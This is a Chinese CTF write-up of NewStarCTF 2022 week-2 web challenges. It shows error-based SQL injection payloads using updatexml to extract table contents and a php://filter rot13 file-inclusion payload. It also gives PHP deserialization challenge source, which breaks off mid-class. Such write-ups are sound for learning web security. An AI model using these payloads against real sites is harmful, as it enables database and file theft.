七校联合NewStarCTF 公开赛赛道WEEK2 web wp

原创

已于 2022-10-02 22:47:55 修改 · 3.3k 阅读

21 ·

CC 4.0 BY-SA版权

文章标签：

#php #web安全 #安全

于 2022-09-26 19:28:40 首次发布

也不知道是不是公开赛和内部赛是不是同一套题，week1的题挺简单的
这里小记一下week2的题目
如有侵权立刻删除

Word-For-You(2 Gen)

这题很简单就带过一下吧，报错注入就行

1’||updatexml(1,concat(0x7e,database()),1)#
1’||updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#
在这里插入图片描述

最后没记错flag好像在 wfy_comments 这个表里的text下
1’||updatexml(1,concat(0x7e,(select reverse(group_concat(text)) from wfy_comments)),1)#
reverse一下倒着取
在这里插入图片描述
取出来逆一下

IncludeOne

伪随机
在这里插入图片描述
应该是要爆破种子
看题目里随机了两次我们也随机两次

然后写个伪协议，base被禁了就用rot13
在这里插入图片描述 ?file=php://filter/NewStar/read=string.rot13/resource=flag.php

然后去解码
在这里插入图片描述

UnserializeOne

反序列化

 <?php
error_reporting(0);
highlight_file(__FILE__);
#Something useful for you : https://zhuanlan.zhihu.com/p/377676274
class Start{
   
   
    public $name;
    protected $func;

    public function __destruct()
    {
   
   
        echo "Welcome to NewStarCTF, ".$this->name;
    }

    public function __isset($var)
    {
   
   
        ($this->func)();
    }
}

class Sec{
   
   
    private $obj;
    private $var;

    public function __toString()
    {
   
   
        $this->obj->check($this->var);
        return "CTFers";
    }

    public function __invoke()
    {
   
   
        echo file_get_contents('/flag');
    }
}

class Easy{
   
   
    public $cla;

    public function __call($fun, $var)
    {
   
   
        $this->cla = clone $var[